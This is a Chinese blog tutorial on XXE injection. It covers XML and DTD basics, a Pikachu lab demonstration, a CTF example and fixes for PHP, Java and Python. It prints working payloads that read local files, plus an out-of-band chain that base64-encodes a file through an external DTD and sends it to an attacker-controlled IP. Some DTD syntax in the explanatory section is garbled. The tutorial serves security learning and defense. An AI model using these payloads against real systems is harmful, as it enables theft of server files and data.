XXE漏洞

最新推荐文章于 2025-08-15 22:26:00 发布
原创 最新推荐文章于 2025-08-15 22:26:00 发布 · 722 阅读 · 14 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #网络 #xxe

XXE:XML External Entity 即外部实体注入,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。其实XML是一门语言,类似于html,但是后来主要用xml的文档格式来传输数据,但是现在比较新的系统,大家之前传输数据用的是json了。现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。
以PHP为例,在PHP里面解析xml用的是libxml,其在≥2.9.0的版本中,默认是禁止解析xml外部实体内容的。如果你测试用的php中解析xml用的libxml的版本大于了2.9.1,为了模拟漏洞,那么可以通过手动指定LIBXML_NOENT选项开启xml外部实体解析功能。


详细教程:https://www.w3school.com.cn/xml/xml_tree.asp

文档结构

简单了解即可,不需要细看,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素

<?xml version=”1.0” encoding="gb2312" encoding=”UTF-8”?>   //xml声明、版本、编码
<!DOCTYPE root system "http://www.XXXX.com/file"[   //定义DTD文件,格式为:root指定根
节点名称,system声明要使用的外部DTD文件路径,后面加文件URL,注意[]包裹。


<!ELEMENT root (other)>   // 元素声明,声明xml中包含的元素,声明中需要指定元素名称
(root、other等)和元素类别、内容等


<!ELEMENT to (#PCDATA)>   // <!--定义to元素为”#PCDATA”类型-->


<!ELEMENT generalentity "content" > //ELEMENT标签用于声明实体,关于实体的定义如下:“实体是用于定义引用普通文本或特殊字符的快捷方式的变量”实体是在DTD文件中定义的变量,xml解析器解析xml
文件的时候,会将被的引用替换为实体内容,实体分为:预定义实体、普通实体、参数实体,此处定义了普通实体generalentity,内容为content

<!ELEMENT % extendentity SYSTEM "http://www.XXXX.com/file">   //定义参数实体,格式
为:<!ELEMENT % 参数名称 参数内容>


引用格式:%参数名称

参数实体只能在DTD文件中引用,内部DTD文件的参数引用只能出现于DTD标签可出现的位置,外部DTD文件参数实体的引用可以出于DTD标签内容,比如:<!ELEMENT % "%another">


%extendentity; //引用参数外部实体

DTD的基础知识

Document Type Definition 即文档类型定义,用来为XML文档定义语义约束。可以嵌入在XML文档中(内部声明),也可以独立的放在一个文件中(外部引用),由于其支持的数据类型有限,无法对元素或属性的内容进行详细规范,在可读性和可扩展性方面也比不上XML Schema。

参考链接: http://www.w3school.com.cn/dtd/index.asp

对于安全人员来讲,就认识下面的几行代码即可。

首先了解下基本的PAYLOAD结构,然后再介绍每部分涉及的知识点,如下PAYLOAD开头进行了XML的声明,然后使用DTD声明实体(这里使用了file协议),最后使用XML获取实体的数据。

基本的PAYLOAD结构:

上面的fles:///etc/passwd,这是直接读取服务器的passwd文件内容。最后XML部分就是调用DTD的foo功能,也就是调用xxe,取出数据然后显示,基本上任何xxe的攻击代码都是这么几部分。

使用DTD实体的攻击方式 :
DTD 引用方式(简要了解):
1. DTD 内部声明

`<!DOCTYPE 根元素 [元素声明]>

2. DTD 外部引用

<!DOCTYPE 根元素名称 SYSTEM "外部DTD的URI">

3. 引用公共DTD

<!DOCTYPE 根元素名称 PUBLIC "DTD标识名" "公用DTD的URI">

示例:

<?xml version="1.0"?>  
<!DOCTYPE configuration PUBLIC "-//mybatis.org//DTD Config 3.0//EN"
"http://mybatis.org/dtd/mybatis-3-config.dtd">
......
命名方法:以!DOCTYPE开始,configuration是文档根元素名称;
PUBLIC表示是公共DTD;-表示是非ISO组织;mybatis.org表示组织;
DTD 表示类型;Config 表示标签;3.0是标签后附带的版本号;
EN表示DTD语言是英语;最后是DTD的URL;

示例

先看看phpinfo

phpstudy,我们使用的php版本中。libxml可能版本大于了2.9.1,所以我们切换一下php版本

再看版本

然后看一下pikachu中的xxe_1.php源代码,这个文件中有xxe攻击payload示例代码,就下面这几句

对于用户提交的xml数据,负责接收和执行的代码也在上述文件中,下面的位置

好,pikachu测试一下
payload如下:而且你需要掌握的代码就这几行,大家最好能够背下来。

<?xml version = "1.0"?>
<!DOCTYPE ANY [
   <!ENTITY f SYSTEM "file:///C://1.txt">
]>
<x>&f;</x>

我们先到目标主机中创建一个1.txt

效果

如何找xxe漏洞

1.查看请求头

可以对pikachu的示例进行抓包,看效果

accept请求头里面最好能够接受xml。

2.抓包修改数据类型

这里我们看一个真实的ctf考试题示例,将json数据改为xml数据,完成xxe攻击
详细可见:https://xz.aliyun.com/t/3357
jarvisoj上的一道题目API调用
这道题的题目说明是 :请设法获得目标机器/home/ctf/flag.txt中的flag值。
进入题目 http://web.jarvisoj.com:9882/ 发现一个输入框,我们对其进行抓包

分析数据包

是一个json数据提交,修改数据发现可以被解析,修改为xml

XXE攻击情况

进行xxe攻击的时候,有两种情况:有回显和无回显
有回显就是请求有响应数据能看到
无回显就是看不到响应数据

我给大家准备了工具,分别来演示一下这两种情况

1.有回显
这种的比较简单
payload如下

<?xml version = "1.0"?> <!DOCTYPE note [     <!ENTITY hacker SYSTEM
"file:///c:/windows/win.ini" > ]> <name>&hacker;</name>

效果

这种就属于有回显,直接将文件数据展示出来了。

2.无回显
没有信息返回,可以使用外带数据通道提取数据,先使用php://filter获取目标文件的内容,然后将内容
以http请求发送到接受数据的服务器(攻击服务器)xxx.xxx.xxx。分如下两步
<?xml version = "1.0"?> <!DOCTYPE note [     <!ENTITY hacker SYSTEM
"file:///c:/windows/win.ini" > ]> <name>&hacker;</name>
a.建立*.dtd,比如我创建了一个test.dtd文件,内容如下,就放我我们上面目标主机的xxe2文件夹里面
了。

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-
encode/resource=file:///c:/1.txt"><!ENTITY % int "<!ENTITY &#37; send SYSTEM 'http://192.168.0.105:8080?
p=%file;'>">

这两句代码的意思是通过base64编码的方式读取文件内容,然后通过请求目标主机的ip地址加上一个不存在的路径或者参数数据,让它报错,%file就是用上面第一句获取到的数据

b.xml调用

<!DOCTYPE convert [
<!ENTITY % remote SYSTEM "http://ip/test.dtd">
%remote;%int;%send;
]>

效果:保存信息里面就有我们要读取的文件数据

如果无报错的话,需要访问接收请求的服务器中的日志信息,可以看到经过base64编码过的数据,解码后便可以得到数据。

我们清楚第看到服务器端接收到了我们用 base64 编码后的敏感文件信息(编码也是为了不破坏原本的XML语法),不编码会报错

整个调用过程:

我们从 payload 中能看到 连续调用了三个参数实体 %remote;%int;%send;,这就是我们的利用顺序,%remote 先调用,调用后请求远程服务器上的 test.dtd ,有点类似于将 test.dtd 包含进来,然后 %int调用 test.dtd 中的 %file, %file 就会去获取服务器上面的敏感文件,然后将 %file 的结果填入到 %send以后(因为实体的值中不能有 %, 所以将其转成html实体编码 % ),我们再调用 %send; 把我们的读取到的数据发送到我们的远程 vps 上,这样就实现了外带数据的效果,完美的解决了 XXE 无回显的问题。

XXE漏洞修复与防御

1.提高版本
libxml  >2.9.0

2.代码修复:
PHP:

libxml_disable_entity_loader(true);

JAVA:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);
setFeature("http://apache.org/xml/features/disallow-doctype-decl",true);
setFeature("http://xml.org/sax/features/external-general-entities",false)
setFeature("http://xml.org/sax/features/external-parameter-entities",false);

Python:

from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

3.手动黑名单过滤(不推荐)
过滤关键词: <!DOCTYPE 、 <!ENTITY SYSTEM 、 PUBLIC

阿荼啊图
关注
XXE漏洞以及XXE漏洞如何修复
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 2万+
XXE漏洞是什么?XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。这些就称为XXE漏洞。知道XXE漏洞前首先得先了解XML。XXE漏洞如何修复的方案一:使用开发语言提供的禁用外部实体的方法1.PHP开发语言禁用外部实体的方法:libxml_disable_entity_loader(true);XXE漏洞如何修复的方案二:尽量不要让用户直接
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXE(XML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
XXE 漏洞
saber的博客
10-29 795
介绍了XML外部实体注入(XXE漏洞及其潜在危害,包括但不限于文件读取、系统命令执行、拒绝服务攻击等。该漏洞主要发生在允许引用外部实体的XML环境中,攻击者可通过构造恶意内容来触发,进而实施攻击。文章还详细讨论了如何通过编程语言内置的XML解析函数或第三方库来防止此类漏洞,以及针对已发现漏洞的修补方法。
XXE漏洞笔记
qq_32812063的博客
11-26 798
XXE
xxe漏洞详解
2402_89693936的博客
05-23 939
XXE漏洞XML External Entity Injection,即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网扫描、攻击内网等危害。
XXE漏洞学习
zakefine的博客
02-06 1124
XML 指可扩展标记语言(EXtensible Markup Language)XML 是一种标记语言,很类似 HTMLXML 的设计宗旨是传输数据,而非显示数据XML 标签没有被预定义。需要自行定义标签。XML 被设计为具有自我描述性。XML 是W3C 的推荐标准XML 被设计为传输和存储数据,其焦点是数据的内容。HTML 被设计用来显示数据,其焦点是数据的外观。
Pikachu–XXE漏洞
lza20001103的博客
02-13 1004
Pikachu–XXE漏洞
XXE漏洞详解
渗透之路,攻防之间皆学问
03-03 6071
php 中使用 simplexml_load_string() 函数解析 xml 数据,并返回一个对象。当simplexml_load_string() 使用了 LIBXML_NOENT 选项后,将允许 XML 解析器解析外部实体,并将外部文件的内容嵌入到 XML 数据中。
XXE漏洞简介
记录学习
06-01 1259
XXE漏洞简介
XXE漏洞复现
C233333235的博客
07-25 1321
XML外部实体注入(XML Extenrnal Entity Injection),简称XXE漏洞。引发XXE漏洞的主要原因是XML解析依赖库libxml默认开启了对外部实体的引用,导致服务端在解析用户提交的XML信息时未作处理直接进行解析,导致加载恶意的外部文件和代码,造成任意文件读取,命令执行(利用条件苛刻)内网扫描等危害在本篇 文章中我们使用pikachu靶场实现XXE漏洞复现。
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE漏洞主要出现在应用接收并解析XML格式的数据时。如果服务器开启了外部实体加载功能,攻击者可以通过构造含有恶意外部实体的XML文档,诱使服务器去读取或执行非预期的资源。比如,攻击者可以定义一个外部实体来...
5、XXE漏洞pdf资料
10-15
XXE(XML External Entity)漏洞是针对XML解析器的安全漏洞,它发生在XML解析器处理包含外部实体引用的...开发人员应采取适当的安全措施,确保XML解析过程安全,以防止攻击者通过XXE漏洞获取敏感信息或执行恶意操作。
网络安全_XXE漏洞_多语言演示环境_教育研究_1741858468.zip
03-14
XXE漏洞允许攻击者通过插入恶意的XML实体来执行服务器端的代码,从而达到获取敏感信息、拒绝服务或进行远程代码执行等目的。由于其潜在的破坏力,针对XXE漏洞的防范和教育研究显得尤为重要。 在教育研究方面,通过...
105-web漏洞挖掘之XXE漏洞1
08-03
XXE漏洞详解】 XXE,全称为XML External Entity Injection,是XML解析器在处理XML输入时因未能正确配置,允许加载外部实体而导致的安全漏洞。这类漏洞允许攻击者注入恶意的XML外部实体,进而获取敏感信息、执行...
【web站点安全开发】任务4:JavaScript与HTML/CSS的完美协作指南
不羁的博客
08-14 907
本文介绍了JavaScript在前端开发中的核心作用及其与HTML、CSS的协作方式。主要内容包括:1. JavaScript语言特性,通过对比表格展示其与Java在类型系统、面向对象、执行方式等方面的本质区别;2. JavaScript在HTML中的使用方法,包括<script>标签的三种放置位置(head/body/外部文件);3. 四种常用输出方式(alert/write/innerHTML/console.log);4. 语法特性比较(变量声明、数据类型、函数定义等)等
安全防范方案
huluang的专栏
08-15 825
防火墙通过GeoIP数据库封禁国外IP,需配置白名单防误封。
Web攻防-大模型应用&LLM搭建&接入第三方&内容喂养&AI插件&安全WiKI库&技术赋能
最新发布
SuperherRo的博客
08-15 522
知识点: 1、WEB攻防-LLM搭建-AI喂养&安全知识WIKI库
智慧养老丨实用科普+避坑指南:科技如何让晚年生活更安全舒适?
zskj_zhyl的博客
08-13 564
一位中风康复用户使用非接触式睡眠仪后,家属可远程查看夜间离床次数,及时调整护理方案,但需警惕部分产品数据解读复杂。我们这次主要介绍四类典型智慧养老产品,结合真实体验给出选购建议,并揭秘常见消费陷阱,助您理性选择。邯郸社区引入智能洗浴机后,失能老人洗浴频率从每月1次提升至每周2次,家庭矛盾显著减少。用户反馈显示,某品牌智能手表的跌倒检测准确率高,且支持家人远程查看健康数据。但需注意,部分低价产品误报率高,且续航不足,影响使用体验。选择时,建议与老人共同体验试用装,倾听其真实感受。
xxe漏洞
07-21
### XXE漏洞原理 XXE(XML External Entity)漏洞是一种由于应用程序在解析XML输入时允许引用外部实体而导致的安全漏洞。XML是一种结构化文档格式,广泛用于数据存储和传输,其中“外部实体”是XML标准中允许的一种特性,用于引用外部资源。然而,当应用程序未正确配置XML解析器以禁用外部实体时,攻击者可以构造恶意XML文档,利用该特性读取服务器上的文件、发起服务器端请求伪造(SSRF)、造成拒绝服务(DoS)等攻击[^1]。 具体而言,XXE漏洞的攻击通常发生在应用程序接受用户输入并将其解析为XML文档的场景中。攻击者通过在XML文档中插入恶意定义的外部实体,使得XML解析器在解析过程中访问攻击者指定的资源。例如,攻击者可以构造一个外部实体,指向服务器上的敏感文件(如`/etc/passwd`),从而实现任意文件读取的目的[^2]。 ### XXE漏洞防护方法 为了有效防止XXE漏洞的发生,可以从以下几个方面入手: 1. **禁用外部实体** 在处理XML输入时,应禁用所有外部实体引用。不同的编程语言提供了相应的配置选项来实现这一点。例如,在Java中使用`DocumentBuilderFactory`时,可以通过设置`FEATURE_SECURE_PROCESSING`和禁用`external-general-entities`来防止外部实体注入;在Python中使用`xml.etree.ElementTree`库时,默认情况下不解析外部实体,但若使用`xml.dom.minidom`或`lxml`等库,则需要手动配置以禁用外部实体[^1]。 2. **输入验证和过滤** 对所有XML输入进行严格的验证和过滤,确保其格式正确且不包含任何潜在危险的内容。例如,可以使用白名单机制,仅允许特定的标签和属性,拒绝其他所有内容。此外,还可以对用户输入进行转义处理,防止恶意实体被注入到XML文档中[^1]。 3. **安全配置服务器** 确保服务器和应用程序的配置符合安全最佳实践。例如,在Web服务器上禁用不必要的XML解析功能,限制XML解析器的权限,避免其访问敏感文件或发起外部请求。此外,还可以通过设置防火墙规则,限制XML解析器对外部资源的访问[^1]。 4. **升级解析器版本** 定期更新和升级使用的XML解析器,以确保其具备最新的安全补丁和功能。许多现代解析器已经默认禁用了外部实体,或者提供了更安全的配置选项,因此保持解析器的最新状态是防止XXE漏洞的重要措施。 5. **使用替代数据格式** 在可能的情况下,避免使用XML作为数据传输格式,转而使用更安全的替代方案,如JSON。JSON不支持外部实体,因此天然免疫于XXE攻击[^4]。 ### 示例代码:禁用外部实体(Python) 以下是一个在Python中使用`lxml`库禁用外部实体的示例代码: ```python from lxml import etree parser = etree.XMLParser(resolve_entities=False, external_entities=False) xml_data = "<!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><root>&xxe;</root>" try: tree = etree.fromstring(xml_data, parser) except etree.XMLSyntaxError as e: print("XML解析错误:", e) ``` 在上述代码中,通过设置`resolve_entities=False`和`external_entities=False`,可以有效禁用外部实体,从而防止XXE攻击。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值